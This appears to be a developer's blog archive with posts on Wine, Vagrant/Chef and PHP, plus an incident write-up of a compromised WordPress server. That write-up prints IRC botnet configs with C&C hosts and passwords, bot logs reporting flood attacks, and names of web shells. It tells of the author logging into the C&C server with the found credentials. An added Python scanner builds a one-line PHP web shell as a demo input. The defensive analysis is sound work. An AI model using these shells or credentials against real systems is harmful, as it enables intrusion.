Workaround for Running WoW With Patch 5.0.4 on Ubuntu

After a fresh install I couldn't get WoW to work. I'm not that big on playing games lately, but this bugged me. Good thing we have the interwebs.

Starting the Battle.net agent manually before firing up the WoW launcher stopped the launcher from crashing.

$ wine ~/.wine/drive_c/users/Public/Application\ Data/Battle.net/Agent/Agent.1267/Agent.exe --nohttpauth &
$ wine ~/.wine/drive_c/Program\ Files\ \(x86\)/World\ of\ Warcraft/Launcher.exe &

Installing vcrun2008 with winetricks solved the problem with the updater hanging.

[1] http://appdb.winehq.org/objectManager.php?sClass=version&iId=25610&iTestingId=70352
[2] http://www.codeweavers.com/compatibility/browse/name/?forum=1;app_id=7714;mhl=130618;msg=130314

Set Up a Basic PHP Development Environment With Vagrant and Chef Solo

There are plenty of posts about this out there already, and this is nothing new I guess, but I am going to post it anyway. This weekend I spent some time playing with Vagrant, and every setup guide seemed to be missing some steps, which made the whole process a bit of a hassle. So I compiled my own steps in the post below. The goal was to create a basic Debian box for my PHP development, from which I could serve my local development files.

To start off we need some packages:

VirtualBox: to create the virtual development image.

NFS packages: to make sharing files between host and guest easy as pie.

Vagrant: to package the virtual image and manage the newly created box.

$ sudo apt-get install virtualbox vagrant nfs-common nfs-kernel-server

Now is a good moment to download any Linux distro you want. I chose Debian, as it's the most common in my day-to-day work.

$ wget http://cdimage.debian.org/debian-cd/6.0.5/i386/iso-cd/debian-6.0.5-i386-netinst.iso

Now launch VirtualBox and create a new virtual machine. Just do what you normally do when you create a VM, but make sure to choose VMDK (Virtual Machine Disk) as the disk format. The rest should be OK. When the VM is created, start it up and choose the freshly downloaded Linux ISO to start the installation.

I only installed the base system plus the SSH server. When that's all done and the VM is running, log in as root and install some packages Vagrant needs.

$ apt-get install sudo ruby ruby-dev libopenssl-ruby rdoc ri irb build-essential ssl-cert curl rubygems puppet

I won't be setting up a Chef server to manage the Vagrant images, but I will be using Chef Solo to manage installing packages. So let's install Chef.

Install Chef

Set up the Opscode package repositories for APT.

$ echo "deb http://apt.opscode.com/ $(lsb_release -cs)-0.10 main" | tee /etc/apt/sources.list.d/opscode.list
$ gpg --keyserver keys.gnupg.net --recv-keys 83EF826A
$ gpg --export packages@opscode.com | tee /etc/apt/trusted.gpg.d/opscode-keyring.gpg > /dev/null

83EF826A is a short key ID, and short IDs are cheap to collide on a keyserver. Before exporting the key into APT's trust store, run gpg --fingerprint 83EF826A and compare the full fingerprint with the one Opscode publishes.

And finally install the Opscode keyring and, of course, Chef.

$ apt-get update
$ apt-get install opscode-keyring
$ apt-get install chef

The installer will ask for the Chef server URL. I left it empty because I will be using Chef Solo.

Now we need to add a user for Vagrant to connect with.

$ adduser vagrant        (password: vagrant)
$ groupadd admin
$ usermod -a -G admin vagrant

Make sure the admin users can sudo without a password. Together with the well-known vagrant/vagrant credentials and the public Vagrant SSH key set up below, this makes the box trivially rootable by anyone who can reach its SSH port, so keep it on NAT or a host-only network and never expose it on a shared LAN.

$ visudo
%admin ALL=(ALL) NOPASSWD: ALL

Disable reverse DNS lookups in the SSH server. This avoids slow logins when the guest cannot resolve the connecting host's address.

$ vi /etc/ssh/sshd_config
UseDNS no

Change the MOTD to something nice. The file only needs to be world-readable, not world-writable.

$ bash -c "echo 'Sweeet! A Vagrant box cooked by Chef!!' > /etc/motd"
$ chmod 0644 /etc/motd

Switch to the vagrant user to set up the insecure Vagrant public SSH key. This key pair is published in the Vagrant repository, so anyone has the private half; it is only acceptable because the box is never reachable from outside the host.

$ su vagrant
$ mkdir -p ~/.ssh
$ chmod 0700 ~/.ssh
$ curl -o ~/.ssh/authorized_keys https://raw.github.com/mitchellh/vagrant/master/keys/vagrant.pub
$ chmod 0600 ~/.ssh/authorized_keys

That's it for the VM. Now it's time for Vagrant to do some magic. First we need to create a Vagrant package from the newly created VM (devbox is the name I gave the VM in VirtualBox).

$ vagrant package --base devbox
$ mv package.box devbox.box

Done! Let’s test it.

$ vagrant box add devbox devbox.box
$ mkdir test && cd test
$ vagrant init devbox
$ vagrant up
$ vagrant ssh

Voilà, SSH'd into the VM.

$ exit
$ vagrant halt
$ vagrant destroy

So that's all fine and dandy, but a base system with SSH is not that useful. That's where Chef comes in. Like I mentioned earlier, I won't be using a Chef server; I will be using Chef Solo, and will be doing a very basic setup.

In Chef, the scripts that install and configure things are called recipes, and recipes are grouped into cookbooks. They can be found all over the place, but the main repository is Opscode's (https://github.com/opscode/cookbooks). So in our Vagrant folder we create a folder called cookbooks.

$ mkdir cookbooks && cd cookbooks

And we install some basic cookbooks, plus a very simple one I hacked together to install the latest dotdeb package repositories (https://github.com/tlenss/misc/tree/master/chef/cookbooks/dotdeb). Clone the Opscode cookbooks into this directory (the trailing dot keeps them directly under cookbooks/, which is what the cookbooks_path below expects), copy the dotdeb cookbook next to them, and go back to the Vagrant folder.

$ git clone https://github.com/opscode/cookbooks .
$ git clone https://github.com/tlenss/misc /tmp/misc && cp -r /tmp/misc/chef/cookbooks/dotdeb .
$ cd ..

This will be enough for now and allows for some basic PHP development. To enable these cookbooks we have to edit the Vagrantfile.

$ vi Vagrantfile

Add these lines for the Apache port forward and the NFS share (Vagrant 1.0 syntax). The forward is what makes http://localhost:8080 on the host reach Apache in the guest, and /dev/location is the host-side directory to share; NFS sharing needs the host-only network set up in the next step.

config.vm.forward_port 80, 8080
config.vm.share_folder "www", "/var/www", "/dev/location", :nfs => true

Uncomment the :hostonly line so we can reach Apache from the local box, and add a hosts-file mapping on the host for that address.

config.vm.network :hostonly, "192.168.164.123"

$ sudo sed -i '$ a\192.168.164.123 dev.box' /etc/hosts

Configure Chef's cookbook path and add some recipes from the cloned cookbooks.

config.vm.provision :chef_solo do |chef|
  chef.json = {
    "mysql" => {
      "server_root_password" => "somepassword",   # dev-only; this sits in plain text in the Vagrantfile
      "bind_address" => "127.0.0.1"               # keep MySQL off the host-only interface
    }
  }
  chef.cookbooks_path = "cookbooks"
  chef.add_recipe("dotdeb")
  chef.add_recipe("dotdeb::php54")
  chef.add_recipe("openssl")
  chef.add_recipe("apache2")
  chef.add_recipe("apache2::mod_php5")
  chef.add_recipe("apache2::mod_rewrite")
  chef.add_recipe("mysql")
  chef.add_recipe("mysql::server")
  chef.add_recipe("memcached")
  chef.add_recipe("vim")
  chef.add_recipe("php")
  chef.add_recipe("php::module_curl")
  chef.add_recipe("php::module_mysql")
  chef.add_recipe("php::module_memcache")
  chef.add_recipe("php::module_sqlite3")
end

Time to call Vagrant again. This time the startup takes a bit longer, as all the selected packages get installed. Once that's done, a fresh development box is waiting.

$ vagrant up
$ vagrant ssh

Let’s check PHP

$ php -v
PHP 5.4.6-1~dotdeb.0 (cli) (built: Aug 19 2012 08:45:58)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies

What about apache?

$ ps aux | grep apache
root       790  0.1  0.2   5352 2580 ?   Ss   23:40   0:00 /usr/sbin/apache2 -k start
www-data   793  0.0  0.1   5124 1764 ?   S    23:40   0:00 /usr/sbin/apache2 -k start
www-data   797  0.0  0.2 546408 2412 ?   Sl   23:40   0:00 /usr/sbin/apache2 -k start
www-data   798  0.0  0.2 546408 2404 ?   Sl   23:40   0:00 /usr/sbin/apache2 -k start
www-data   811  0.0  0.2 546408 2424 ?   Sl   23:40   0:00 /usr/sbin/apache2 -k start

Nice! And pointing the browser at http://localhost:8080 (or at http://dev.box/ via the host-only address) loads the NFS shared folder through Apache. That's it for now. Time to sleep…

Some sources I used:
[1] http://vagrantup.com/v1/docs/base_boxes.html
[2] https://github.com/yevgenko/cookbook-dotdeb
[3] http://vagrantup.com/v1/docs/provisioners/chef_solo.html

Adding Colors to PHP CLI Script Output

I always loved writing CLI scripts, and in PHP this is no different. I write a lot of CLI importers, scrapers, reporters, etc. Sometimes I want a bit more funk in my output than the standard black and white. When output is important I add some colors to make things clearer, and this is not hard at all.

First off, it's probably a good thing to gather some of the available colors. A good resource is available here. Some of the colors and their corresponding ANSI codes are listed below; note that each "light" variant is the same base color with the bold attribute (1) set.

Black        0;30    Dark Gray     1;30
Blue         0;34    Light Blue    1;34
Green        0;32    Light Green   1;32
Cyan         0;36    Light Cyan    1;36
Red          0;31    Light Red     1;31
Purple       0;35    Light Purple  1;35
Brown        0;33    Yellow        1;33
Light Gray   0;37    White         1;37

So how do I output colors, you ask? Well, that's just plain easy. It's a bit like setting up colors in your Linux PS1 environment variable.

Displaying a line in red, for instance, can be done simply by echoing from the script with some extra formatting for the terminal to pick up. I will explain the line below in a bit.

echo "\033[31m some colored text \033[0m\n"; // red, then reset
echo "\033[32m some colored text \033[0m\n"; // green, then reset

So what's going on here. First we send an escape character, \033 (or \e in PHP 5.4 and later), so the terminal knows a control sequence follows. Then [31m selects red as the foreground color. "some colored text" is printed in that color, and the color stays in effect until we send \033[0m, which resets all attributes. Closing with the same color code again, as it is tempting to do, leaves the terminal red for everything that follows.
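As an added example (mine, not code from the original post), here is the same idea as a small Python helper, which also covers the two things that bite in practice: the reset sequence after the colored text, and only emitting color codes when the output is a terminal, so that redirecting a report to a file or piping it through grep does not fill it with escape bytes. The color names and the strip_ansi helper are my own choices.

```python
import re
import sys

# Base SGR colour numbers; the table's "light" variants are the same number
# with the bold attribute (1) set, e.g. yellow is really bold brown (1;33).
FG = {"black": 30, "red": 31, "green": 32, "brown": 33,
      "blue": 34, "purple": 35, "cyan": 36, "light_gray": 37}

# Any SGR sequence: ESC [ <params> m
ANSI_SGR = re.compile(r"\x1b\[[0-9;]*m")


def colorize(text, color, bold=False, tty=None):
    """Wrap text in an SGR colour sequence and always reset (\\033[0m) after it.

    Colour codes are only emitted when writing to a terminal; tty=None
    checks sys.stdout, so `script.py > report.txt` yields clean text.
    """
    if tty is None:
        tty = sys.stdout.isatty()
    if not tty:
        return text
    return "\033[%d;%dm%s\033[0m" % (1 if bold else 0, FG[color], text)


def strip_ansi(text):
    """Remove SGR sequences, e.g. before writing captured output to a log."""
    return ANSI_SGR.sub("", text)


if __name__ == "__main__":
    print(colorize("error: disk full", "red", bold=True))
    print(colorize("ok", "green"))
```

Pass tty=True or tty=False explicitly when the destination is not sys.stdout (a log handler, a socket), since isatty() on the wrong stream is the usual source of stray escapes in log files.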

Easy as cake… that’s all!

Abbywinters Is Looking for New Developers

If you're looking for a new, challenging and exciting Senior Web Developer position, don't look any further. If you already think you have the job of your dreams, think again!

abbywinters.com (NSFW) is one of the largest and most ethical, highly rated, well designed, and successful erotic websites in the world today. abbywinters.com is the WINNER of the AVN 2011 Awards for Best Membership site!

And we are looking to hire a new talented webdeveloper to expand our small team. What would you think about joining our small Agile team of highly qualified professionals?

You will be creating sexy, exciting and game-changing experiences for the web, work for one of the industry leaders, and just be part of an awesome company. Some of the job's key elements are:

  • Implementing development projects

  • Leading informal mentoring during day-to-day work

  • Contribute to design of development projects

  • Track, reduce, and prevent technical debt in Web Development projects

Motivated by principles of social responsibility, we deliver provocative media by embracing imagination, creativity and emerging technologies. Our models, customers and business partners are inspired by our fervid passion.

Our experienced staff use state-of-the-art content production facilities to produce 10 shoots a week from concept to finished art, utilizing the most advanced digital capture, post production and delivery systems in the world.

You will be working directly with our Web Dev Manager, Lead developer and colleagues in the web dev team. We need each individual to contribute for us to continue as a pioneer in our industry.

If you possess a "can do" attitude, would like to work in the centre of Amsterdam, and can identify yourself in the criteria below, you might want to head over to our career portal for a more detailed description.

Technical competencies – Required

  • High level of skill with PHP 5

  • High level of skill with Object Oriented Programming

  • High level of skill with HTML/CSS

  • High level of skill with JavaScript

  • High level of skill with Internet Applications

  • Moderate level of skill with Unit Testing and Test Driven Design

  • Moderate level of skill with MySQL

  • Moderate level of skill with Windows XP operating system

  • Experience with the GNU/Linux operating system

  • Competent with Revision Control systems (Subversion)

  • Bachelor of Science in Computer Science, or equivalent experience

  • Zend Certified Engineer, or equivalent experience

  • At least 5 years experience in Web Application Development

Technical competencies – Desired

  • Moderate level of skill with the Apache HTTP server

  • Good understanding of the Model-View-Controller pattern

  • Good understanding of the ActiveRecord Object-Relational-Mapping pattern

  • Familiarity with Agile software development practices (Scrum)

  • E-commerce

  • Agile development experience

Regular Expression Name Based Matches

Normally when I write regular expressions, with for instance PHP's preg_match, I use the standard $matches array to catch the result of pattern matches. This array has a numeric index for each match found, and looks something like:

$matches = array();
preg_match("/^Get(.+)Repository$/", "GetFooBarRepository", $matches);
var_dump($matches);

array(2) {
  [0] => string(19) "GetFooBarRepository"
  [1] => string(6) "FooBar"
}

And there is nothing wrong with that, except that numeric indexes are not always easy to work with, and they don't look all that clean in the code itself. So last week my lead developer pointed out that he likes using named indexes for the matched patterns. And this is pretty sweet. I had seen it before but never bothered to adopt it myself. The result looks like:

$matches = array();
preg_match("/^Get(?<repositoryName>.+)Repository$/", "GetFooBarRepository", $matches);
var_dump($matches);

array(3) {
  [0] => string(19) "GetFooBarRepository"
  ["repositoryName"] => string(6) "FooBar"
  [1] => string(6) "FooBar"
}

And I have to say, it looks a lot cleaner. Note that the numeric entry [1] is still there alongside the name, so existing code keyed on $matches[1] keeps working. I added this to my bag of tricks and will be using it from now on.

PHP: Only Variables Should Be Passed by Reference

Last week I got this error while doing some coding with a new library, and at first I didn't quite get what was causing it. The line in question looked like:

$url = reset($file->getPaths());

So how can that throw an error like "Only variables should be passed by reference", you might ask? reset() takes its argument by reference, because it has to move the array's internal pointer. A function's return value is a temporary, not a variable, so there is nothing for the reference to bind to, and PHP emits this strict-standards notice. The call still returns the first element in practice, but relying on that is fragile, and it has nothing to do with getPaths() itself; any by-reference function fed a return value behaves the same way.

So from now on I will be doing the thing below: assign the result to a variable first, then pass the variable.

$paths = $file->getPaths();
$url = reset($paths);

Using SSH Key Authentication With EGit in ZendStudio

For the past few months I have been switching some projects over to Git from Subversion, and have been trying to get the hang of all the command line options available. I will be doing that for a while longer until I get completely comfortable. For communication with the remote Git server I have been using SSH key authentication, which works smoothly, just like it did with Subversion.

But I wanted to check out the Git support available in Zend Studio 9, and hit a problem pretty quickly, which I will describe below. First I create a local clone of my Git project.

$ git clone ssh://[somehost]/~/git/project.git

To test if everything is working I do a test commit. If that succeeds I push it out to the remote master.

$ cd project
$ touch TEST
$ git add TEST
$ git commit -m "test commit"
$ git push origin master

So that works fine. Now time to see how Zend Studio handles this. To create a project I use the Create from Git option and select the local checkout I just created. This reads the whole repository configuration, and you are basically done from here. But as I mentioned earlier, I had some difficulties getting things running smoothly. I discovered that when it was time to push changes to the master repository.

When I used the Push to Upstream option, I was greeted by a login panel that seemed to have selected the correct SSH key and user to perform the login. But when I typed the passphrase, it just kept asking for it, again and again. Hmm. That sucks! The passphrase was correct. I tried with a newly created key. No luck either. The last thing I tried was updating to a nightly build of EGit found here, but this offered no solution either.

After reading a couple of complaints I found this bug report for the EGit Eclipse plugin. The thread contains a solution for the login issue I was having. Gotta love Google!

Apparently the problem has to do with the cipher used to encrypt the SSH private key. The EGit plugin (which uses JSch for the SSH communication) was having problems with AES-encrypted private keys, and the fix is to replace the bundled JSch library with a newer version.

So let's download JSch and update it manually. The library (JSch 0.1.46) can be found here.

$ cd ZendStudio9
$ find . -name '*jsch*' -type f

Found it: plugins/com.jcraft.jsch_0.1.41.v201101211617.jar. So let's update that. Since this jar is the code that handles your SSH private key, check the downloaded file's checksum against the one published with the JSch release before dropping it in.

$ cp plugins/com.jcraft.jsch_0.1.41.v201101211617.jar plugins/com.jcraft.jsch_0.1.41.v201101211617.jar.backup
$ wget -O jsch-0.1.46.jar http://sourceforge.net/projects/jsch/files/jsch.jar/0.1.46/jsch-0.1.46.jar/download
$ mv jsch-0.1.46.jar plugins/com.jcraft.jsch_0.1.41.v201101211617.jar

After restarting Zend Studio everything worked fine again. Another problem solved! Thanks to the guys who posted in the EGit bug thread. Some good community karma here! Time for other things. Hope it helps!

Recruiter Rant

While doing our routine sprint retrospective today, we got interrupted by our office manager Wendy: an important phone call for me. Hmm… Should have known.

I picked up the phone, and the guy (Amoria Bond) on the other end immediately started his sales pitch. Oh shit, another one of those nasty recruiters. So after listening to him for a few seconds I quickly interrupted him, told him I was not interested in a new job at all, and that he was a jerk and extremely unprofessional for calling me at the office, completely unaware (or maybe intentionally?) of what impact this might have if for instance my manager picks up the phone. Besides, it's just plain rude.

Now don't get me wrong. It's not a rant for nothing. I don't hate recruiters, and have worked with some professional ones in the past. I've always enjoyed communicating with Linda-Lotte while she was still working for Recruit4it, and the guys at Starapple are OK as well. But this guy today really pissed me off with his aggressive, unmannered approach. It's a shame I didn't catch his name while I was in rant mode. But please don't ever call me again.

Update:

It seems to be some new tactic to call developers at the office where they work. This happened a couple more times after this post. So this is for the next recruiter that calls me at the office: I'll personally come over and kick your ass!!

Wordpress Install Compromised

Last week I got an email from the Dutch NCSC (Nationaal Cyber Security Centrum). Apparently one of the nodes I manage for a customer was part of a botnet. There were no further demands; they just informed me about the issue. Damn cool! Being part of a botnet, however: not so cool!

With the email came a small excerpt of an IRC channel log. I recognised the node, so I SSH'd into it and used netstat to check for any strange connections. A connection on port 20 to the C&C node of the botnet. That's not good.

$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address          Foreign Address        State
tcp        0      0 xxx.xxx.xxx.xx:20      69.162.80.62:20        ESTABLISHED

The email from NCSC said to look for files called wp-rss3.php, but a search for this file did not return any hits. Hmmm. And I still had no idea which site it concerned, since a couple were running on this particular node. The only thing certain: it's WordPress related. So I started searching for recent WordPress compromises and found a lot of hits on Google for the TimThumb and wps3slider plugins. But checking the log files for these plugins revealed nothing, and for some weird reason I had just cleaned up the log partition a couple of days before. So not much luck there.

Some more Googling told me to search the WordPress installs for the PHP function base64_decode(). Oh well, let's give it a try. Some suspicious files showed up instantly.

$ find . -type f -exec grep -l 'base64_decode' {} \;
./uploads/2010/06/wp-rss4.php (source)
./uploads/2011/05/alienee.php (source)
./plugins/wps3slider/temp/34e3a3a74f6e2d0f236bdd3ba70c0c03.php (source)
./plugins/wps3slider/temp/cf2cdb3ad3249b9692de07290f16f287.php (encoded) (decoded)
./plugins/wps3slider/temp/771b821c974131c67e34c83d8d2db725.php (encoded) (decoded)
./plugins/wps3slider/temp/2b3753ea4769084f2e571737b695b03a.php (encoded) (decoded)
./plugins/wps3slider/temp/7228f168d9692eafeafc54dbc3a1ab49.php (encoded) (decoded)
./plugins/wps3slider/uploads/1.php (source)
/var/tmp/dc.pl (encoded) (decoded)

Interesting. A quick look at the files showed that most of them were obfuscated, but not all. Two of the files were IRC bots written in PHP. At this moment I couldn't resist cracking a little smile, but it's also a reminder of how fragile the web really is. I quickly moved the files out of the way and rebooted the machine. When it came back online I monitored all connections for a while, but the connection to the C&C node was not restored. So I informed NCSC and went back to bed!
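As an added example (my code, not the author's and not any of the pastebinned samples), here is a small Python triage script that does what the base64_decode hunt above does, and a bit more: it walks a tree, flags PHP and Perl files that use the usual obfuscation and execution primitives, and statically peels a nested eval(str_rot13(base64_decode("..."))) wrapper back to the plain payload, so you can read what a dropped file does without ever executing it. The indicator list is an assumption based on what this post found (base64 and rot13 wrappers) and is a starting point, not a complete signature set; the files the demo writes are constructed for the example.

```python
import base64
import codecs
import os
import re
import tempfile
import zlib

# Obfuscation and execution primitives typical of dropped PHP shells.
# Assumption: this covers what this post found (base64/rot13 wrappers, eval,
# command execution); extend it for your own environment.
INDICATORS = {
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    "gzinflate": re.compile(r"\bgzinflate\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "exec_call": re.compile(r"\b(?:system|shell_exec|passthru|popen|proc_open)\s*\("),
    "long_b64_literal": re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"),
}


def scan_text(src):
    """Return the sorted list of indicator names present in one file's source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))


def scan_tree(root, exts=(".php", ".phtml", ".pl")):
    """Map each flagged file (path relative to root, '/'-separated) to its indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_text(fh.read())
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


# Inverse of each PHP wrapper function, keyed by the PHP name seen in source.
DECODERS = {
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "str_rot13": lambda s: codecs.decode(s, "rot13"),
    "gzinflate": lambda s: zlib.decompress(s.encode("latin-1"), -15).decode("latin-1"),
    "strrev": lambda s: s[::-1],
}

# A call chain around one string literal, e.g. eval(str_rot13(base64_decode("...")))
CHAIN = re.compile(r"((?:\w+\s*\(\s*)+)(['\"])(.*?)\2\s*\)+", re.S)


def unwrap(src):
    """Statically undo a nested decoder chain and return the innermost payload.

    Decoders run innermost-first, the order PHP itself would apply them, so
    nothing from the file is evaluated. Returns None if no chain is present;
    raises on a wrapper we have no inverse for rather than guessing.
    """
    m = CHAIN.search(src)
    if m is None:
        return None
    funcs = re.findall(r"\w+", m.group(1))  # outermost call first
    payload = m.group(3)
    for fn in reversed(funcs):
        if fn in DECODERS:
            payload = DECODERS[fn](payload)
        elif fn not in ("eval", "assert", "print", "echo"):
            raise ValueError("unknown wrapper function: " + fn)
    return payload


# ---- demo on constructed files (not real samples from the compromised host) ----
PLAIN_SHELL = "<?php system($_GET['c']); ?>"


def build_obfuscated(plain):
    """Produce PHP that does eval(str_rot13(base64_decode(X))), as the dropped files did."""
    blob = base64.b64encode(codecs.encode(plain, "rot13").encode("latin-1")).decode("ascii")
    return '<?php eval(str_rot13(base64_decode("%s"))); ?>' % blob


def demo_scan():
    """Write one clean and one obfuscated file into a temp tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads", "2010", "06"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
        with open(os.path.join(root, "uploads", "2010", "06", "wp-rss4.php"), "w") as fh:
            fh.write(build_obfuscated(PLAIN_SHELL))
        return scan_tree(root)


if __name__ == "__main__":
    for path, found in sorted(demo_scan().items()):
        print(path, ", ".join(found))
    print(unwrap(build_obfuscated(PLAIN_SHELL)))
```

Run it against a copy of the web root taken before the reboot, not the live tree, so file mtimes survive for the timeline; and treat a clean scan as weak evidence only, since a shell that hides its decoder behind variable functions or string concatenation will not match these patterns.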

The WordPress admin should have kept the sites up to date. Lesson learned, I hope! Of course I could not resist coming back to it later, and so I did. I started by searching the Apache log files for wp-rss4.php, and found a couple of instances where this file was called directly, from a total of 4 different IP addresses.

69.162.80.62

This is the IP address of the C&C server.

186.241.16.25
201.8.237.18
201.8.226.109

These IP addresses all originate from Brazil. No further information is available at the moment. After that I started poking around the trojans / IRC bots found earlier. As mentioned, there were two bots installed on the server: one was running, the other wasn't.

Here is the configuration snippet from each bot. The first is the one NCSC informed me about:

var $config = array("server"=>"antesedepois.servegame.com",^M
                     "port"=>20,^M
                     "pass"=>"depois",^M
                     "prefix"=>"depois",^M
                     "maxrand"=>8,^M
                     "chan"=>"#depoiswp",^M
                     "key"=>"",^M
                     "modes"=>"+iB-x",^M
                     "password"=>"depois",^M
                     "trigger"=>".",^M
                     "hostauth"=>"*" // * for any hostname^M

And the second one:

var $config = array("server"=>"58.225.75.155",
                     "port"=>9999,
                     "pass"=>"",
                     "prefix"=>"animal",
                     "maxrand"=>8,
                     "chan"=>"#animal",
                     "key"=>"",
                     "modes"=>"+iB-x",
                     "password"=>"oishi",
                     "trigger"=>".",
                     "hostauth"=>"*!*@The.Black.Cat" // * for any hostname
                     );

Notice the ^M characters at the end of each line of the first config: the file has CRLF line endings, so somebody edited it on Windows. So now we have login details for two C&C servers. Why not take a look.

$ ircii
/server antesedepois.servegame.com:20

Some standard IRC stuff

Connecting to port 20 of server antesedepois.servegame.com
Welcome to the Internet Relay Chat Network, root (from IRCPRIVATE)
/etc/irc/script/local V0.5 for Debian finished. Welcome to ircII.
If you have not already done so, please read the new user information with /HELP NEWUSER
Your host is IRCPRIVATE, running version 1.2.1546
This server was created jan 27 2012 at 06:29:02
HodB (Serial # 00-00-00) channel modes available abdefghijklmnopqrstuvwxyzACEFIKLMOPT IRCX
There are 6 users and 362 invisible on 1 servers
7 channels have been formed
This server has 368 clients and 0 servers connected
Current local users: 368 Max: 989
Current global users: 368 Max: 989
MOTD Not Present

So let’s check the channels on this thing

/list

Channel     Users  Topic
#depoiswp   360    Entrou = Ban :)
#grmteam    6
#depoisSca  4      Entrou = Ban :)
#depoisVul  6      Entrou = Ban :)
#rfi        3
#sql        1

I entered all of the channels and waited for a while, but no activity took place. The only really interesting channel is #depoiswp (the topic "Entrou = Ban :)" is Portuguese for "joined = banned"). This is the channel where all the bots connect; at the time I logged in there were about 360 of them. I immediately recognised the log excerpt sent to me by the NCSC.

Topic for #depoiswp: Entrou = Ban :)
#depoiswp SYSTEM 1327945185 (#depoiswp/#depoiswp) Entrou = Ban :)
[A]depois88802849 (~depois48170648@68.233.238.XX) has joined channel #depoiswp
#depoiswp 1327653297
[A]depois13436992 (~depois92951214@212.227.114.XX) has joined channel #depoiswp
[A]depois18833547 (~depois69088341@184.154.130.XX) has joined channel #depoiswp
[A]depois80116634 (~depois13242297@213.251.189.XXX) has joined channel #depoiswp
[A]depois31855907 (~depois23946193@82.85.28.XXX) has joined channel #depoiswp
[A]depois25458508 (~depois64120008@87.106.214.XX) has joined channel #depoiswp
[A]depois17803105 (~depois55004207@74.208.16.XX) has joined channel #depoiswp
[A]depois96800217 (~depois89042073@174.121.216.XXX) has joined channel #depoiswp
[A]depois17108432 (~depois51961332@209.68.1.XXX) has joined channel #depoiswp
[A]depois95432403 (~depois13925479@209.68.1.XXX) has joined channel #depoiswp
[A]depois96515275 (~depois10767943@195.74.38.XXX) has joined channel #depoiswp
[A]depois73596561 (~depois90562179@69.89.31.XXX) has joined channel #depoiswp
[A]depois85357227 (~depois31697723@64.191.115.XX) has joined channel #depoiswp
[A]depois07993697 (~depois40240585@79.96.128.XX) has joined channel #depoiswp
[A]depois97441253 (~depois19633359@193.189.74.XX) has joined channel #depoiswp
[A]depois76843389 (~depois55419325@176.9.34.XXX) has joined channel #depoiswp
[I]depois16679788 (~depois28004829@213.171.218.XXX) has joined channel #depoiswp
*** [A]depois88178285 (~depois05296405@74.220.215.XXX) has joined channel #depoiswp

<[A]depois16231776> [Attack Finalizado!]: 1749605 MB enviados / Pacotes enviados: 14580 MB/s
<[I]depois60130568> [Attack Finalizado!]: 75 MB enviados / Pacotes enviados: 1 MB/s
<[I]depois48664304> [Attack Finalizado!]: 75 MB enviados / Pacotes enviados: 1 MB/s
<[I]depois65415449> [Attack Finalizado!]: 75 MB enviados / Pacotes enviados: 1 MB/s
<[I]depois11325010> [Attack Finalizado!]: 75 MB enviados / Pacotes enviados: 1 MB/s
[A]depois40994506 (~depois72760562@79.98.28.XX) has joined channel #depoiswp
<[A]depois07568398> [Attack Finalizado!]: 2187317 MB enviados / Pacotes enviados: 18228 MB/s
<[A]depois55402758> [Attack Finalizado!]: 11425 MB enviados / Pacotes enviados: 95 MB/s
[A]depois03383512 (~depois52457929@74.220.215.XX) has joined channel #depoiswp
<[A]depois37064023> [Attack Finalizado!]: 1264043 MB enviados / Pacotes enviados: 10534 MB/s
<[A]depois69234369> [Attack Finalizado!]: 2205504 MB enviados / Pacotes enviados: 18379 MB/s
[A]depois74911768 (~depois04730096@74.220.215.XX) has joined channel #depoiswp
Signoff: [A]depois31575043 (Connection reset by peer)
<[I]depois17710498> [Attack Finalizado!]: 81 MB enviados / Pacotes enviados: 1 MB/s
<[I]depois28464134> [Attack Finalizado!]: 81 MB enviados / Pacotes enviados: 1 MB/s

("Attack Finalizado!: N MB enviados / Pacotes enviados: N MB/s" is Portuguese for "attack finished: N MB sent / packets sent: N MB/s"; the bots are reporting the result of a flood attack back to the channel.)

That's fine and all. I disconnected shortly after that; I really have no reason to be poking around there, now do I ;) Besides, who wants to interfere with an ongoing investigation? Poking around the files a bit more did not reveal all that much more information, except that besides an IRC bot a backdoor was also installed, in the form of a Perl script dc.pl in /var/tmp. So who knows, the server might be rooted at this point.

I spent some more time decoding the bot and trojan contents, and posted them on pastebin if you are interested. The server is going to be decommissioned soon, so I am not going to pay much more attention to it.

1.php and b2dabd0e2c42b55fabf741bcac29f857.php

Web Shell by boff

2b3753ea4769084f2e571737b695b03a.php

This file was base64 encoded, but once decoded revealed a simple script by v0pCr3w and nob0dyCr3w to run system commands on the server. Also included was a simple upload form.

34e3a3a74f6e2d0f236bdd3ba70c0c03.php

c99 injector v1

771b821c974131c67e34c83d8d2db725.php

This script was rot13 and base64 encoded, and was trying to clean up after the attacker and install a second backdoor.

7228f168d9692eafeafc54dbc3a1ab49.php and cce0a37ffc138a8908da05977639bed1.php

Again rot13 and base64 encoded, but this script contained something that looks like a control panel. The page title was 'Hacked by Sherif #oishi @ ALLnet'.

alienee.php

Still working on this one.

cf2cdb3ad3249b9692de07290f16f287.php and ded3244749701c4eb5a29b959ad56736.php

These files contained a second bot that was connecting to a completely different server. Probably exploited by another crew?

dc.pl

This Perl backdoor was created by one of the IRC bot scripts, and was hiding in /var/tmp after creation.

And some links I found useful while working on this issue:
http://eromang.zataz.com/2012/01/08/gangbang-mytijn-org-malware-spreader-down/
http://www.madirish.net/content/hookworm-stealth-php-backdoor
http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

PHP Critical Bug CVE-2012-0830

OK, it's a bit late, but I have been living under a rock for the last week, and I guess it can't hurt!

